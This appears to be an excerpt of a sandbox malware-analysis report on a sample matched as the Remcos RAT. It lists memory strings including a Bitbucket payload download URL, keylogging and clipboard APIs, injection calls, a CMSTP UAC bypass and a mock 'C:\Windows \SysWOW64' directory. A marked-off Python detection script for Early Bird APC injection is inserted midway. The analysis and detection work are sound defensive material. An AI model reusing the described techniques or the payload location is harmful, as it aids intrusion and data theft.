              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-6
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000819000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
              Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020B1D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/masterservicwes/ma
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknown HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 3.5.30.3:443 -> 192.168.2.6:49718 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029299E4 SetWindowsHookExA 0000000D,029299D0,00000000 6_2_029299E4
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02935A45 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_02935A45
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029359C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_029359C6
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029559C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_029559C6
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02929B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,6_2_02929B10
              Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

              E-Banking Fraud

              Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293BB77 SystemParametersInfoW,6_2_0293BB77
              Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295BB77 SystemParametersInfoW,19_2_0295BB77

              System Summary

Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D48730 NtQueueApcThread
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D47A2C NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D47D78 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D48D70 GetThreadContext,SetThreadContext,NtResumeThread
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D48D6E GetThreadContext,SetThreadContext,NtResumeThread
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D47A2A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D4DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E464CA NtQueryInformationToken
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E57460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E44823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E4643A NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E5C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E5A135 NtSetInformationFile
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E46500 NtQueryInformationToken,NtQueryInformationToken
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E34E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E44759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E464CA NtQueryInformationToken
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E57460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E44823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E4643A NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E5C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E5A135 NtSetInformationFile
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E46500 NtQueryInformationToken,NtQueryInformationToken
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E34E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E44759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E38730 NtQueueApcThread
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E37A2C NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E3DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E37D78 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E37AC9 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E37A2A NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E3DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E3DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E3DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E38D6E GetThreadContext,SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E38D70 GetThreadContext,SetThreadContext,NtResumeThread
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E34C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D48788 CreateProcessAsUserW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_029358B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_029558B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\Public\alpha.pif | File created: C:\Windows
Source: C:\Users\Public\alpha.pif | File created: C:\Windows \SysWOW64
Source: C:\Users\Public\alpha.pif | File deleted: C:\Windows \SysWOW64
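Two things in the listing above are worth turning into checks. The jW3NEKvxH1.exe and Dlaybpxl.PIF functions resolve NtAllocateVirtualMemory, NtWriteVirtualMemory and NtQueueApcThread next to GetThreadContext/SetThreadContext/NtResumeThread, which is the Early Bird APC injection sequence (queue an APC on the main thread of a suspended process, then resume it so the payload runs before the entry point). The alpha.pif file operations create and later delete "C:\Windows \SysWOW64", where "Windows " carries a trailing space: a mock trusted directory that a naive path check treats as the real one. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses report lines in the format shown on this page (including the extracted form in which the Source and Code function cells run together and the function id is repeated, and the "Jump to behavior" link text), aggregates resolved APIs per image, and flags both patterns. The sample lines are constructed from entries on this page; the regular expressions and the API set used as the Early Bird signature are my own assumptions, not Joe Sandbox's.

```python
"""Detection helpers over Joe Sandbox 'Code function' / 'File created' lines.

Added example, not part of the sandbox report: parses lines of the form
  Source: <image> Code function: <pid>_<phase>_<addr> <api>,<api>,...
  Source: <image> File created|deleted: <path>
and flags the Early Bird APC injection API set and mock trusted directories.
"""
import re
from collections import defaultdict

# Assumed Early Bird signature: all four must be resolved by the same image.
EARLY_BIRD_APIS = frozenset({
    "NtAllocateVirtualMemory",   # region allocated in the (suspended) target
    "NtWriteVirtualMemory",      # payload copied in
    "NtQueueApcThread",          # APC queued on the not-yet-started main thread
    "NtResumeThread",            # thread resumed; the APC runs before the entry point
})

# "C:\Windows \SysWOW64": a trusted directory name followed by trailing space(s).
MOCK_DIR_RE = re.compile(
    r"^[a-z]:\\(?:windows|program files(?: \(x86\))?) +(?:\\|$)", re.I)

# \s* (not \s+) before "Code function" tolerates the fused extraction "exeCode function:".
CODE_FN_RE = re.compile(
    r"^Source:\s*(?P<image>.+?)\s*Code function:\s*(?P<fid>\d+_\d+_[0-9A-F]+)\s*(?P<apis>.*?)\s*$", re.I)
# No \s* before the optional link text, so a trailing space in the path survives.
FILE_OP_RE = re.compile(
    r"^Source:\s*(?P<image>.+?)\s*File (?P<op>created|deleted):\s*(?P<path>.*?)(?:Jump to behavior)?$", re.I)

# Constructed sample input modelled on lines from this report (both the fused and the clean form).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D48730 NtQueueApcThread,0_2_02D48730",
    r"Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D47A2C NtAllocateVirtualMemory",
    r"Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D47D78 NtWriteVirtualMemory",
    r"Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48D70 GetThreadContext,SetThreadContext,NtResumeThread",
    r"Source: C:\Users\Public\alpha.pif Code function: 9_2_00E464CA NtQueryInformationToken",
    r"Source: C:\Users\Public\alpha.pifFile created: C:\WindowsJump to behavior",
    r"Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64Jump to behavior",
    r"Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64",
    r"Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293BB77 SystemParametersInfoW",
]


def parse_report_lines(lines):
    """Return ({image: set(api_names)}, [(image, op, path), ...])."""
    apis_by_image = defaultdict(set)
    file_ops = []
    for raw in lines:
        line = raw.lstrip().rstrip("\r\n")
        m = CODE_FN_RE.match(line)
        if m:
            fid = m.group("fid").lower()
            for tok in m.group("apis").split(","):
                tok = tok.strip()
                # the fused table form repeats the function id after the API list
                if tok and tok.lower() != fid:
                    apis_by_image[m.group("image")].add(tok)
            continue
        m = FILE_OP_RE.match(line)
        if m:
            file_ops.append((m.group("image"), m.group("op").lower(), m.group("path")))
    return dict(apis_by_image), file_ops


def early_bird_images(apis_by_image):
    """Images whose resolved API set covers the whole Early Bird sequence."""
    return sorted(img for img, apis in apis_by_image.items() if EARLY_BIRD_APIS <= apis)


def mock_directory_ops(file_ops):
    """File operations on paths that impersonate a trusted directory via trailing spaces."""
    return [(img, op, path) for img, op, path in file_ops if MOCK_DIR_RE.match(path)]


def analyze(lines=SAMPLE_LINES):
    apis, ops = parse_report_lines(lines)
    return {"early_bird": early_bird_images(apis), "mock_dirs": mock_directory_ops(ops)}


if __name__ == "__main__":
    for key, hits in analyze().items():
        print(key, hits)
```

Feed it the report's own lines (or an EDR's API trace reduced to the same shape) and the Early Bird check fires only on images that resolve the complete sequence, so a program that merely calls NtAllocateVirtualMemory is not flagged. The mock-directory check keys on the space before the backslash, which is exactly what a string comparison against "C:\Windows\" misses.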
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DF43CB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DF83B0
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D320C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DF419C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DEE6E0
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DD4601
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DF4628
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DCA4D5
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02E0A490
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DDE403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DDE53D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3C9DF
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D3C98F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DE8907
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02E09662
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DDD7E4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DED73A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DD5B6F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DE9FD9
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DF3F6D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02E03CC9
